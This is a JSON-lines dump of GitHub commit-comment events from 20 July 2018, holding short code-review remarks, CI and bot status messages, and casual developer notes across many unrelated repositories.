{"id":"7993331364","type":"CommitCommentEvent","actor":{"login":"VarshaGopigiri"},"repo":{"name":"VarshaGopigiri/VarshaGopigiriRepo0813131817"},"payload":{"comment":{"id":29774917,"position":null,"line":null,"path":null,"commit_id":"a1234cdea75fb12cfb1ebabb7875305b440cfeba","created_at":"2018-07-20T07:13:46Z","updated_at":"2018-07-20T07:13:46Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-20T07:13:46Z"}
{"id":"7993331634","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"hookbil/ruby_learning"},"payload":{"comment":{"id":29774920,"position":29,"line":29,"path":"lesson_2/date.rb","commit_id":"aa8ceabba18de964e2d9aca4a143a50fd598eed5","created_at":"2018-07-20T07:13:51Z","updated_at":"2018-07-20T07:13:51Z","author_association":"NONE","body":"переменная days_in_month неверно отражает смысл, потому что она про дни в месяце, а не про дни в месяцАХ"}},"created_at":"2018-07-20T07:13:51Z"}
{"id":"7993332225","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"hookbil/ruby_learning"},"payload":{"comment":{"id":29774921,"position":36,"line":36,"path":"lesson_2/date.rb","commit_id":"aa8ceabba18de964e2d9aca4a143a50fd598eed5","created_at":"2018-07-20T07:14:00Z","updated_at":"2018-07-20T07:14:00Z","author_association":"NONE","body":"нет пустой строки"}},"created_at":"2018-07-20T07:14:00Z"}
{"id":"7993332904","type":"CommitCommentEvent","actor":{"login":"297092319"},"repo":{"name":"297092319/first"},"payload":{"comment":{"id":29774924,"position":null,"line":null,"path":null,"commit_id":"55f63d30e023550529429614c81dfbbcc9c8071a","created_at":"2018-07-20T07:14:10Z","updated_at":"2018-07-20T07:14:10Z","author_association":"OWNER","body":"assadasdasdasd"}},"created_at":"2018-07-20T07:14:10Z"}
{"id":"7993337814","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"hookbil/ruby_learning"},"payload":{"comment":{"id":29774934,"position":19,"line":19,"path":"lesson_2/fibonacci.rb","commit_id":"aa8ceabba18de964e2d9aca4a143a50fd598eed5","created_at":"2018-07-20T07:15:25Z","updated_at":"2018-07-20T07:15:25Z","author_association":"NONE","body":"вопрос, а зачем в цикле добавлять по два числа? \r\nсделай цикл, который добавляет одно число в массив\r\nочень удобно их брать не из переменных, а просто последние два числа из массива"}},"created_at":"2018-07-20T07:15:25Z"}
{"id":"7993342642","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/conan-feedstock"},"payload":{"comment":{"id":29774945,"position":null,"line":null,"path":null,"commit_id":"8e4b25f0b8e1181fd3557706c92de71e76acf07d","created_at":"2018-07-20T07:16:41Z","updated_at":"2018-07-20T07:16:41Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @memsharded was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T07:16:41Z"}
{"id":"7993343080","type":"CommitCommentEvent","actor":{"login":"oshai"},"repo":{"name":"holgerbrandl/kscript"},"payload":{"comment":{"id":29774946,"position":null,"line":null,"path":null,"commit_id":"a4cd8e3ba1ad913c2dc3de7a7e0281a758907c4c","created_at":"2018-07-20T07:16:48Z","updated_at":"2018-07-20T07:16:48Z","author_association":"CONTRIBUTOR","body":"Thanks!"}},"created_at":"2018-07-20T07:16:48Z"}
{"id":"7993346679","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"hookbil/ruby_learning"},"payload":{"comment":{"id":29774952,"position":35,"line":35,"path":"lesson_2/shopping.rb","commit_id":"aa8ceabba18de964e2d9aca4a143a50fd598eed5","created_at":"2018-07-20T07:17:48Z","updated_at":"2018-07-20T07:17:48Z","author_association":"NONE","body":"в целом очень не плохо, но у тебя вывод данных идет внутри метода add_product\r\nа это неверно. add_product должен просто добавлять продукт. \r\n\r\nты можешь его сделать add_products, внутри убрать loop, и если ввели стоп - делать return, без всяких exit\r\n\r\n"}},"created_at":"2018-07-20T07:17:48Z"}
{"id":"7993356263","type":"CommitCommentEvent","actor":{"login":"luceos"},"repo":{"name":"flarum/core"},"payload":{"comment":{"id":29774978,"position":20,"line":52,"path":"migrations/2018_01_11_155200_change_discussions_b8_columns.php","commit_id":"90792abf103c5d0ed505edd6dc759728fe1e1f0b","created_at":"2018-07-20T07:20:10Z","updated_at":"2018-07-20T07:20:10Z","author_association":"MEMBER","body":"Woops I forgot some!\r\n\r\nThe foreign key constraint inside Laravel is created in the following format:\r\n\r\n```\r\n<table>_<column>_foreign\r\n```\r\n\r\nWe can override this naming convention using the second argument of the `foreign()` call when creating a constraint.\r\n\r\n![image](https://user-images.githubusercontent.com/504687/42988756-18ac2bdc-8bfe-11e8-872c-6875b64273f7.png)\r\n"}},"created_at":"2018-07-20T07:20:10Z"}
{"id":"7993365608","type":"CommitCommentEvent","actor":{"login":"FearlessWu"},"repo":{"name":"FearlessWu/function-library"},"payload":{"comment":{"id":29774996,"position":null,"line":null,"path":null,"commit_id":"96cd7cbfa18ce53c8948a1ef82939bf8ed6500ce","created_at":"2018-07-20T07:22:32Z","updated_at":"2018-07-20T07:22:32Z","author_association":"OWNER","body":"下三角分解"}},"created_at":"2018-07-20T07:22:32Z"}
{"id":"7993368625","type":"CommitCommentEvent","actor":{"login":"worldofpeace"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29775001,"position":null,"line":null,"path":null,"commit_id":"aab3182ca4a2b69bfd01db53e1e95c941425203b","created_at":"2018-07-20T07:23:19Z","updated_at":"2018-07-20T07:23:19Z","author_association":"CONTRIBUTOR","body":"Sorry I misspelled that :)"}},"created_at":"2018-07-20T07:23:19Z"}
{"id":"7993370552","type":"CommitCommentEvent","actor":{"login":"healygreggatyahoo"},"repo":{"name":"healygreggatyahoo/d85commerce"},"payload":{"comment":{"id":29775027,"position":null,"line":null,"path":null,"commit_id":"30c288c502e2ddc74e81c8f69c051178838746fc","created_at":"2018-07-20T07:23:50Z","updated_at":"2018-07-20T07:23:50Z","author_association":"OWNER","body":"Created multidev environment [d85commerce#ci-3](https://dashboard.pantheon.io/sites/807852f7-aed6-4e88-9d1a-894d6b87c3a3#ci-3).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-3-d85commerce.pantheonsite.io/)"}},"created_at":"2018-07-20T07:23:50Z"}
{"id":"7993373304","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29775036,"position":null,"line":null,"path":null,"commit_id":"9cbc9bf14d6cf4980dd4e51b8ab11ccb6ad0aad3","created_at":"2018-07-20T07:24:30Z","updated_at":"2018-07-20T07:24:30Z","author_association":"COLLABORATOR","body":"Please, consider splitting big commits into smaller ones by each fix/feature to simplify understanding."}},"created_at":"2018-07-20T07:24:30Z"}
{"id":"7993376423","type":"CommitCommentEvent","actor":{"login":"dbi-nandordudas"},"repo":{"name":"dbi-nandordudas/CsharpCourse"},"payload":{"comment":{"id":29775047,"position":null,"line":null,"path":null,"commit_id":"bc55e64b5b62734053087a9ba7638c4dad00e1f3","created_at":"2018-07-20T07:25:20Z","updated_at":"2018-07-20T07:25:20Z","author_association":"OWNER","body":"yay"}},"created_at":"2018-07-20T07:25:20Z"}
{"id":"7993376791","type":"CommitCommentEvent","actor":{"login":"tobscure"},"repo":{"name":"flarum/core"},"payload":{"comment":{"id":29775048,"position":20,"line":52,"path":"migrations/2018_01_11_155200_change_discussions_b8_columns.php","commit_id":"90792abf103c5d0ed505edd6dc759728fe1e1f0b","created_at":"2018-07-20T07:25:25Z","updated_at":"2018-07-20T07:25:25Z","author_association":"MEMBER","body":"See https://laravel.com/docs/5.6/migrations#foreign-key-constraints\r\nNo need to use the convention if passing an array to `dropForeign`"}},"created_at":"2018-07-20T07:25:25Z"}
{"id":"7993379238","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29775054,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-20T07:26:04Z","updated_at":"2018-07-20T07:26:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T07:26:04Z"}
{"id":"7993381060","type":"CommitCommentEvent","actor":{"login":"kyokuheki"},"repo":{"name":"kyokuheki/docker-pandoc"},"payload":{"comment":{"id":29775058,"position":null,"line":null,"path":null,"commit_id":"4cb55789c652fb862a8f6aefc801032fe8320eee","created_at":"2018-07-20T07:26:32Z","updated_at":"2018-07-20T07:26:32Z","author_association":"OWNER","body":"https://osdn.net/projects/luatex-ja/ticket/38372 への対応のため．"}},"created_at":"2018-07-20T07:26:32Z"}
{"id":"7993381219","type":"CommitCommentEvent","actor":{"login":"tmoon"},"repo":{"name":"covalent-hq/covalent-secure-models"},"payload":{"comment":{"id":29775059,"position":null,"line":null,"path":null,"commit_id":"43808fa2f8c7d696177ff87a38bc58a936fb16d0","created_at":"2018-07-20T07:26:35Z","updated_at":"2018-07-20T07:26:35Z","author_association":"CONTRIBUTOR","body":"Remove the `get_model_params` method (as we dont get manually get them anymore). The joblib thing you wrote needs to go inside the `secure_store_model_params` i.e. `persist_model` just for being more modular."}},"created_at":"2018-07-20T07:26:35Z"}
{"id":"7993383142","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/gengetopt-feedstock"},"payload":{"comment":{"id":29775064,"position":null,"line":null,"path":null,"commit_id":"f6ac66d057998a3aa7040199617420734909d1c6","created_at":"2018-07-20T07:27:04Z","updated_at":"2018-07-20T07:27:04Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @j-4 was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T07:27:04Z"}
{"id":"7993384465","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29775069,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-20T07:27:25Z","updated_at":"2018-07-20T07:27:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T07:27:25Z"}
{"id":"7993384878","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29775072,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-20T07:27:32Z","updated_at":"2018-07-20T07:27:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T07:27:32Z"}
{"id":"7993389662","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29775081,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-20T07:28:38Z","updated_at":"2018-07-20T07:28:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T07:28:38Z"}
{"id":"7993390098","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29775084,"position":null,"line":null,"path":null,"commit_id":"8375c97aac0f98c37a66333b71ce1b4e5fbec9bc","created_at":"2018-07-20T07:28:44Z","updated_at":"2018-07-20T07:28:44Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 45](https://teamcity.otenv.com/viewLog.html?buildId=8974483&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **UNKNOWN**\nSummary: Canceled (Step 2/2) Build time: 00:15:40"}},"created_at":"2018-07-20T07:28:44Z"}
{"id":"7993390164","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29775085,"position":null,"line":null,"path":null,"commit_id":"2d1a314102b027a22f314fc457533eaa3adbc200","created_at":"2018-07-20T07:28:45Z","updated_at":"2018-07-20T07:28:45Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/90/display/redirect) (on internal Jenkins) failed in stage 'Test docs' 🔥\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/90//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/2d1a314102b027a22f314fc457533eaa3adbc200/90/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/2d1a314102b027a22f314fc457533eaa3adbc200/90/jenkins-results/apicomparison/index.html) (🔥 breaking changes 🔥)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/2d1a314102b027a22f314fc457533eaa3adbc200/90/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/2d1a314102b027a22f314fc457533eaa3adbc200/90/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-20T07:28:45Z"}
{"id":"7993392498","type":"CommitCommentEvent","actor":{"login":"SMfei"},"repo":{"name":"SMfei/StickyNotes"},"payload":{"comment":{"id":29775093,"position":null,"line":null,"path":null,"commit_id":"43eecff689aa0654f3836e1239c95b9657d4740e","created_at":"2018-07-20T07:29:18Z","updated_at":"2018-07-20T07:29:18Z","author_association":"OWNER","body":"便于页面跳转"}},"created_at":"2018-07-20T07:29:18Z"}
{"id":"7993393494","type":"CommitCommentEvent","actor":{"login":"Neredun"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29775094,"position":null,"line":null,"path":null,"commit_id":"b69ab24ff10ce3792125c768548179c658fee28c","created_at":"2018-07-20T07:29:32Z","updated_at":"2018-07-20T07:29:32Z","author_association":"NONE","body":"isn't NPC 38995 (Tirion Fordring) needed to start Lich King boss fight?"}},"created_at":"2018-07-20T07:29:32Z"}
{"id":"7993398458","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29775108,"position":null,"line":null,"path":null,"commit_id":"07c10b476fc64c88105291d5a06637840308c8a9","created_at":"2018-07-20T07:30:47Z","updated_at":"2018-07-20T07:30:47Z","author_association":"COLLABORATOR","body":"Puzzle `1414-beb41dc9` discovered in   [`src/main/groovy/com/zerocracy/stk/pmo/agenda/delete_stale_jobs.groovy`](  https://github.com/zerocracy/farm/blob/master/src/main/groovy/com/zerocracy/stk/pmo/agenda/delete_stale_jobs.groovy)   and submitted as #1448. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-20T07:30:47Z"}
{"id":"7993398720","type":"CommitCommentEvent","actor":{"login":"Traesh"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29775109,"position":null,"line":null,"path":null,"commit_id":"b69ab24ff10ce3792125c768548179c658fee28c","created_at":"2018-07-20T07:30:51Z","updated_at":"2018-07-20T07:30:51Z","author_association":"NONE","body":"He's summoned by the LK script"}},"created_at":"2018-07-20T07:30:51Z"}
{"id":"7993398870","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29775110,"position":19,"line":64,"path":"BsuirFind.Foundation/Services/GameService.cs","commit_id":"9cbc9bf14d6cf4980dd4e51b8ab11ccb6ad0aad3","created_at":"2018-07-20T07:30:53Z","updated_at":"2018-07-20T07:30:53Z","author_association":"COLLABORATOR","body":"Do we really need FinishAt check here?\r\nAs we discussed yesterday, IsStarted remains true after game start."}},"created_at":"2018-07-20T07:30:53Z"}
{"id":"7993398981","type":"CommitCommentEvent","actor":{"login":"mayurmashrannie"},"repo":{"name":"mayurmashrannie/ganeshTest"},"payload":{"comment":{"id":29775111,"position":null,"line":null,"path":null,"commit_id":"99b01b422b582b077d1b57155aa6a7fa479da4e5","created_at":"2018-07-20T07:30:55Z","updated_at":"2018-07-20T07:30:55Z","author_association":"OWNER","body":"ok go ahead"}},"created_at":"2018-07-20T07:30:55Z"}
{"id":"7993401455","type":"CommitCommentEvent","actor":{"login":"kfrukacz-gs"},"repo":{"name":"cloudify-cosmo/cloudify-openstack-plugin"},"payload":{"comment":{"id":29775115,"position":10,"line":58,"path":"blueprints/plugin_testing/use_external_admin_resources_test-blueprint.yaml","commit_id":"0016d6a818f2784f5016df8dae4495a03a8959e7","created_at":"2018-07-20T07:31:34Z","updated_at":"2018-07-20T07:31:34Z","author_association":"NONE","body":"this line has to after openstack_config"}},"created_at":"2018-07-20T07:31:34Z"}
{"id":"7993402671","type":"CommitCommentEvent","actor":{"login":"luceos"},"repo":{"name":"flarum/core"},"payload":{"comment":{"id":29775121,"position":20,"line":52,"path":"migrations/2018_01_11_155200_change_discussions_b8_columns.php","commit_id":"90792abf103c5d0ed505edd6dc759728fe1e1f0b","created_at":"2018-07-20T07:31:52Z","updated_at":"2018-07-20T07:31:52Z","author_association":"MEMBER","body":"🤦‍♂️ "}},"created_at":"2018-07-20T07:31:52Z"}
{"id":"7993403662","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"cormacrelf/angular-skyhook"},"payload":{"comment":{"id":29775122,"position":null,"line":null,"path":null,"commit_id":"7d6f1ac26a34d2bc0a43690bf7b4aa21268aa823","created_at":"2018-07-20T07:32:06Z","updated_at":"2018-07-20T07:32:06Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #18 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-20T07:32:06Z"}
{"id":"7993407770","type":"CommitCommentEvent","actor":{"login":"meteorplus"},"repo":{"name":"cleverbeagle/pup"},"payload":{"comment":{"id":29775129,"position":5,"line":121,"path":"ui/components/AdminUserProfile/AdminUserProfile.js","commit_id":"ce6695f3f3d4164e18bb1c887d4ba283085fa81b","created_at":"2018-07-20T07:33:06Z","updated_at":"2018-07-20T07:33:06Z","author_association":"NONE","body":"YES YOU CAN :D"}},"created_at":"2018-07-20T07:33:06Z"}
{"id":"7993412459","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"c0b/docker-elixir"},"payload":{"comment":{"id":29775135,"position":null,"line":null,"path":null,"commit_id":"5849b7723cf7033532bcdcd14aa811f25f4a205e","created_at":"2018-07-20T07:34:10Z","updated_at":"2018-07-20T07:34:10Z","author_association":"NONE","body":"Thanks for tackling this @c0b! For what is worth, in Elixir itself we always compile it with the lowest supported Elixir version. The table is here: https://hexdocs.pm/elixir/compatibility-and-deprecations.html#compatibility-between-elixir-and-erlang-otp\r\n\r\nAlternatively you can provide images per OTP version."}},"created_at":"2018-07-20T07:34:10Z"}
{"id":"7993414329","type":"CommitCommentEvent","actor":{"login":"jackiebarnes"},"repo":{"name":"nhsconnect/gpconnect"},"payload":{"comment":{"id":29775140,"position":null,"line":null,"path":null,"commit_id":"c36f92709e684798fe2532de350e35ebc37dfd03","created_at":"2018-07-20T07:34:39Z","updated_at":"2018-07-20T07:34:39Z","author_association":"COLLABORATOR","body":"#454 "}},"created_at":"2018-07-20T07:34:39Z"}
{"id":"7993417307","type":"CommitCommentEvent","actor":{"login":"jackiebarnes"},"repo":{"name":"nhsconnect/gpconnect"},"payload":{"comment":{"id":29775151,"position":null,"line":null,"path":null,"commit_id":"b2da5c1165a55df1019976387b00f16908505c10","created_at":"2018-07-20T07:35:27Z","updated_at":"2018-07-20T07:35:27Z","author_association":"COLLABORATOR","body":"#453 "}},"created_at":"2018-07-20T07:35:27Z"}
{"id":"7993418274","type":"CommitCommentEvent","actor":{"login":"jackiebarnes"},"repo":{"name":"nhsconnect/gpconnect"},"payload":{"comment":{"id":29775156,"position":null,"line":null,"path":null,"commit_id":"00578c1eabb75c32723e7038f3980773bc845704","created_at":"2018-07-20T07:35:41Z","updated_at":"2018-07-20T07:35:41Z","author_association":"COLLABORATOR","body":"#453 "}},"created_at":"2018-07-20T07:35:41Z"}
{"id":"7993419703","type":"CommitCommentEvent","actor":{"login":"Andrea2202"},"repo":{"name":"nvdla/sw"},"payload":{"comment":{"id":29775158,"position":null,"line":null,"path":null,"commit_id":"03e90a2e081c7b475088751cb609df31cb14ceb0","created_at":"2018-07-20T07:36:04Z","updated_at":"2018-07-20T07:36:04Z","author_association":"NONE","body":"We need NVDLA compiler for NVDLA small! Is there any progress?"}},"created_at":"2018-07-20T07:36:04Z"}
{"id":"7993420144","type":"CommitCommentEvent","actor":{"login":"jackiebarnes"},"repo":{"name":"nhsconnect/gpconnect"},"payload":{"comment":{"id":29775162,"position":null,"line":null,"path":null,"commit_id":"239c6e9446230af96a7bd5fb0e2c0512e34a8ea8","created_at":"2018-07-20T07:36:10Z","updated_at":"2018-07-20T07:36:10Z","author_association":"COLLABORATOR","body":"#453 #454 "}},"created_at":"2018-07-20T07:36:10Z"}
{"id":"7993420631","type":"CommitCommentEvent","actor":{"login":"AUTHAI-bit"},"repo":{"name":"trezor/connect"},"payload":{"comment":{"id":29775164,"position":12,"line":34,"path":"README.md","commit_id":"34fe6bc2fa95f5b50781a0f599c11f7e9f90ad38","created_at":"2018-07-20T07:36:17Z","updated_at":"2018-07-20T07:36:17Z","author_association":"NONE","body":"[url.html.docx](https://github.com/trezor/connect/files/2212937/url.html.docx)\r\n"}},"created_at":"2018-07-20T07:36:17Z"}
{"id":"7993421383","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29775165,"position":null,"line":null,"path":null,"commit_id":"b78b6e8f05234da085262645cab883010a4d0703","created_at":"2018-07-20T07:36:28Z","updated_at":"2018-07-20T07:36:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add/Edit Member form -- function to add new phone number](https://trello.com/c/PdUM90c3/42-add-edit-member-form-function-to-add-new-phone-number)"}},"created_at":"2018-07-20T07:36:28Z"}
{"id":"7993425636","type":"CommitCommentEvent","actor":{"login":"bemayr"},"repo":{"name":"twobois-oneplan/frontend-experiments"},"payload":{"comment":{"id":29775170,"position":184,"line":97,"path":"penrose-core/field.ts","commit_id":"b6695f68c21de7862abf8b3b8eb3f7751a076507","created_at":"2018-07-20T07:37:34Z","updated_at":"2018-07-20T07:37:34Z","author_association":"CONTRIBUTOR","body":"_fat-arrow-syntax_ can be used"}},"created_at":"2018-07-20T07:37:34Z"}
{"id":"7993431271","type":"CommitCommentEvent","actor":{"login":"bemayr"},"repo":{"name":"twobois-oneplan/frontend-experiments"},"payload":{"comment":{"id":29775176,"position":54,"line":29,"path":"penrose-core/field.ts","commit_id":"b6695f68c21de7862abf8b3b8eb3f7751a076507","created_at":"2018-07-20T07:38:56Z","updated_at":"2018-07-20T07:38:56Z","author_association":"CONTRIBUTOR","body":"fieldType should be a _tagged string property_ in `Field<T>` for me, then we could probably do mapped types and get more type-safety"}},"created_at":"2018-07-20T07:38:56Z"}
{"id":"7993432059","type":"CommitCommentEvent","actor":{"login":"healygreggatyahoo"},"repo":{"name":"healygreggatyahoo/d85commerce"},"payload":{"comment":{"id":29775180,"position":null,"line":null,"path":null,"commit_id":"f320383a2aa371206c6eb7ebccdb120fbb3e3959","created_at":"2018-07-20T07:39:08Z","updated_at":"2018-07-20T07:39:08Z","author_association":"OWNER","body":"Created multidev environment [d85commerce#ci-5](https://dashboard.pantheon.io/sites/807852f7-aed6-4e88-9d1a-894d6b87c3a3#ci-5).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-5-d85commerce.pantheonsite.io/)"}},"created_at":"2018-07-20T07:39:08Z"}
{"id":"7993434604","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29775185,"position":1,"line":11,"path":"lesson1/triangle.rb","commit_id":"1c58011bc6f5c532180f297b53e56a36b7b2b1dc","created_at":"2018-07-20T07:39:48Z","updated_at":"2018-07-20T07:39:48Z","author_association":"NONE","body":"в этой задачке Влад не акцентировал, но мысль та же - значения могут быть не целочисленными"}},"created_at":"2018-07-20T07:39:48Z"}
{"id":"7993435078","type":"CommitCommentEvent","actor":{"login":"cdce8p"},"repo":{"name":"cdce8p/mcf2pdf"},"payload":{"comment":{"id":29775188,"position":null,"line":null,"path":null,"commit_id":"bced1e8d0f0ad6d958b03f52d3c15e145b4c5f62","created_at":"2018-07-20T07:39:56Z","updated_at":"2018-07-20T07:39:56Z","author_association":"OWNER","body":"@gizmo21 I don't have the time to do it. When I was implementing the changes I used `JDK` together with Eclipse, so I only have the the files that are in my repo.\r\nI guess you could use my `myMaster` [branch](https://github.com/cdce8p/mcf2pdf/tree/myMaster), but for everything else you're on your own."}},"created_at":"2018-07-20T07:39:56Z"}
{"id":"7993440062","type":"CommitCommentEvent","actor":{"login":"arnab222"},"repo":{"name":"Kerrjgan/Langtons-Ant"},"payload":{"comment":{"id":29775199,"position":null,"line":null,"path":null,"commit_id":"f139a8fbcb6644c2175a2db6b9e6358b3b0af6a5","created_at":"2018-07-20T07:41:09Z","updated_at":"2018-07-20T07:41:09Z","author_association":"NONE","body":"Hello,\r\nI have opend your project in unity but all the scripts were missing in there fields. How can i solve this? i have used your version of unity and also updated version.but same issue.\r\nThanks in Advance"}},"created_at":"2018-07-20T07:41:09Z"}
